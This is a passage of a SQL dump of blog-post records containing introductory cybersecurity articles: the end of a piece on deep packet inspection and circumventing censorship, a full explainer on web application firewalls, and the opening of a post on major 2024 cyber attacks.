class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">When you send a packet to a website (e.g., Google), your ISP intercepts the packet.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">DPI tools analyze both the metadata (like the domain’s IP address) and the actual content inside the packet.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">If the content matches a blocked site or flagged service, the packet is discarded, preventing access to the site.</li>\r\n</ol>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Is DPI Effective for Censorship?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike traditional IP and DNS blocking, DPI allows ISPs to examine encrypted traffic, such as HTTPS handshakes. 
For instance, even if the website uses HTTPS, DPI can extract information from metadata like the <b><strong class=\"font-bold\">SNI field</strong></b> (Server Name Indication) to determine which website is being accessed.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Challenges with DPI and Its Limitations</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While DPI is powerful, it comes with significant downsides:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Expensive Infrastructure:</strong></b> DPI requires advanced hardware and high-performance processors to analyze packets at scale without slowing down internet speeds.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Overblocking Risks:</strong></b> Many IP addresses host multiple websites, especially on shared hosting or Content Delivery Networks (CDNs). 
Blocking one IP could inadvertently block thousands of unrelated sites.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Resistance Techniques:</strong></b> Individuals and organizations continually develop tools and techniques to bypass DPI.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate DPI Censorship</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The good news is that strategies exist to counteract DPI censorship and protect online privacy. Some common approaches include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Encryption Protocols:</strong></b> Using DNS-over-HTTPS or DNS-over-TLS encrypts DNS queries, ensuring that ISPs cannot see what domains you’re trying to access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">VPNs (Virtual Private Networks):</strong></b> VPNs encrypt all your internet traffic, making it nearly impossible for DPI tools to inspect your data.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Tor Network:</strong></b> The Tor browser routes your traffic through multiple servers (nodes), hiding your real IP address and encrypting your data.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] 
my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Obfuscation Tools:</strong></b> Techniques like encryption proxy services or tools like GoodbyeDPI can disguise your traffic to confuse DPI systems.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ethical Considerations of DPI</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It is important to note that DPI is not solely utilized for censorship—it can also play a role in improving network security. For example, companies use DPI to monitor and protect sensitive data on their networks against cyberattacks. However, when misused for censorship or surveillance, it raises significant ethical questions regarding privacy and freedom of expression.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Deep Packet Inspection represents both a challenge and an opportunity in the ongoing evolution of the internet. While it’s an effective tool for certain legitimate purposes, such as improving cybersecurity, its use in censorship limits freedom and raises privacy concerns.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To achieve a balance, understanding DPI and leveraging protective tools like VPNs and encrypted protocols empowers users to maintain their online freedom.</p>', '', NULL, NULL, 1, 'draft', '2025-01-10 19:28:43', '2026-01-12 21:41:44', 'Information Security', 'Understanding DNS, Deep Packet Inspection, and the Battle Against Internet Censorship', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(81, 'What is a Web Application Firewall? Why We Need to know', 'what-is-a-waf-why-we-need-to-know', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Web applications are the backbone of modern businesses, making them a prime target for cyber threats. For cybersecurity professionals, staying ahead of these threats is critical—and one tool that stands out in protecting web applications is the Web Application Firewall (WAF).</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog explores Web Application Firewalls and their role in safeguarding online assets. We’ll break down their features, their importance, and why knowledge of WAFs is essential for cybersecurity analysts. Whether you\'re just starting out or seeking to improve your defenses, this is your go-to guide for all things WAF.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Web Application Firewall (WAF)?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A Web Application Firewall (WAF) is a security solution designed to protect web applications by filtering, monitoring, and blocking malicious HTTP traffic. 
Unlike conventional firewalls that operate at the network layer, a WAF focuses on the application layer, acting as a shield between your web application and incoming internet traffic.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think of a WAF as a gatekeeper—it scrutinizes every data request hitting your web application to ensure harmful traffic gets blocked while legitimate traffic flows through.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features of Web Application Firewalls:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Traffic Filtering</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs analyze HTTP requests and responses, blocking malicious traffic such as SQL injections or XSS (Cross-Site Scripting) attacks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Real-Time Monitoring</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Continuous surveillance ensures quick detection and prioritization of potential threats as they occur.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong 
class=\"font-bold\">Protection Against Common Attacks</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">They are especially effective at preventing SQL Injection, Cross-Site Request Forgery (CSRF), and other widespread vulnerabilities.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">IP Cloaking</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many modern WAFs hide your web server’s real IP address, adding an additional layer of security against attackers.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Behavioral Analysis</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Advanced WAFs can identify unusual traffic patterns and detect new threats that don’t match known signatures.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Do Web Application Firewalls Work?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs function by analyzing incoming and outgoing HTTP requests using predefined security rules. 
These rules—customizable based on application needs—help determine whether a request should be allowed or blocked.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Typical Process of a WAF:</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Inspection</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The WAF examines each incoming HTTP request.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Filtering</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Requests that don\'t adhere to safety rules are filtered and blocked.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Logging</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Suspicious activities are logged for future analysis by cybersecurity teams.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs are also versatile in deployment:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cloud-Based</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hosted by a cloud provider, allowing scalability and ease of management.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">On-Premise</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Installed directly within an organization’s infrastructure for full control over operations.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network Appliance</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integrated as hardware within the existing network infrastructure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Should Cybersecurity Analysts Understand WAFs?</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Enhanced Web Application Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Web applications are frequent targets for hackers. 
WAFs act as a critical line of defense, protecting applications from cyber threats, including zero-day exploits that aren’t yet widely known.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Meeting Compliance Standards</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Industry regulations, such as PCI DSS (Payment Card Industry Data Security Standard), often require WAF usage to secure consumer data. Familiarity with WAFs ensures organizations meet these legal requirements while minimizing risks of penalties and data breaches.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Proactive Threat Prevention</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs allow security professionals to prevent attacks before they even begin by utilizing behavioral analysis and implementing custom rules.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Complementary to Other Security Measures</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs work seamlessly alongside other security solutions, such as Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS), contributing to a layered, holistic cybersecurity strategy.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. 
Protection Against Emerging Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the ability to adapt to an evolving threat landscape, WAFs are regularly updated to guard against new vulnerabilities, ensuring ongoing protection.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Learning About WAFs for Cybersecurity Beginners</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Boosted Job Prospects</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Expertise with WAFs is in high demand as web applications play critical roles in businesses of all sizes.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Improved Response to Security Breaches</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Knowledge of WAFs allows analysts to quickly identify, address, and minimize impacts of potential breaches.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Broader Understanding of Web Security</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learning 
about WAFs introduces analysts to common attack vectors like cross-site scripting and SQL injections.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Strengthened Critical Thinking Skills</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Setting up and customizing WAF rules enhances problem-solving abilities, helping analysts handle complex challenges.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Challenges and Considerations When Using WAFs</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Despite their many benefits, WAFs aren\'t flawless. Understanding these limitations is crucial for successful implementation:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">False Positives</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Overly strict settings might block legitimate users, potentially impacting the user experience.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Maintenance and Updates</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" 
dir=\"ltr\">Regular rule updates are necessary to keep pace with new threats. Outdated rules may leave security gaps.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Performance Impact</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Poorly configured WAFs can slow down applications. Fine-tuning configurations is essential.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Bypassing Risks</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Advanced threat actors might find ways to evade WAF filters, requiring constant vigilance and adaptation.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of WAF Technology</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise of cloud-based solutions and emerging threats such as API attacks, WAFs are adopting the following innovations:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">AI and Machine Learning Integration</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Enhanced detection 
algorithms use AI to identify threats while reducing false positives.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cloud-Native Features</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs are evolving to secure cloud-first architectures and microservices.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">API Protection</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">APIs are integral to businesses but vulnerable to exploitation—modern WAFs are stepping in to ensure their safety.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Integration with DevSecOps</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Embedding WAFs earlier in the development pipeline to secure applications faster and more efficiently.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Mastering WAFs Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For aspiring cybersecurity professionals, mastering WAF technology is both a necessity and an opportunity to thrive 
in a high-demand field. With evolving cyber threats, the ability to implement and manage WAFs ensures unparalleled protection for digital assets and critical web applications.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Web Application Firewalls are a fundamental tool in cybersecurity, playing a key role in protecting enterprises against today’s rapidly evolving cyber threats. Whether you\'re a novice analyst or an experienced professional looking to sharpen your skills, understanding how to deploy and optimize WAFs will enhance your role in safeguarding web applications.</p>', '', NULL, NULL, 1, 'draft', '2025-01-09 16:45:13', '2026-01-12 21:41:44', 'Information Security', 'What is a Web Application Firewall? Why We Need to know', '', NULL),
(82, 'Biggest Cyber Attacks of 2024: Exploited Vulnerabilities and Lessons Learned', 'biggest-cyber-attacks-of-2024-exploited-vulnerabilities-and-lessons-learned', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyberattacks have surged by 70% in 2024 (Source: Cybersecurity Ventures), signaling an escalating crisis that organizations across all sectors must address. As technology evolves, so do the tactics of cybercriminals, exploiting vulnerabilities at an unprecedented scale. It’s crucial to understand these risks, identify exploited weaknesses, and adopt practical cybersecurity solutions to safeguard your digital assets.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Key trends in cyberattacks in 2024, including ransomware attacks, supply chain vulnerabilities, the surge in cloud-based attacks, and state-sponsored operations. We’ll also analyze proactive methods and essential <b><strong class=\"font-bold\">cybersecurity tips</strong></b> to arm your business against an evolving threat landscape.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Rise of Ransomware Attacks in 2024</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware remains one of the most damaging cyber threats. New reports estimate that ransomware attacks have caused over $20 billion in losses this year alone, targeting industries like healthcare and finance. 
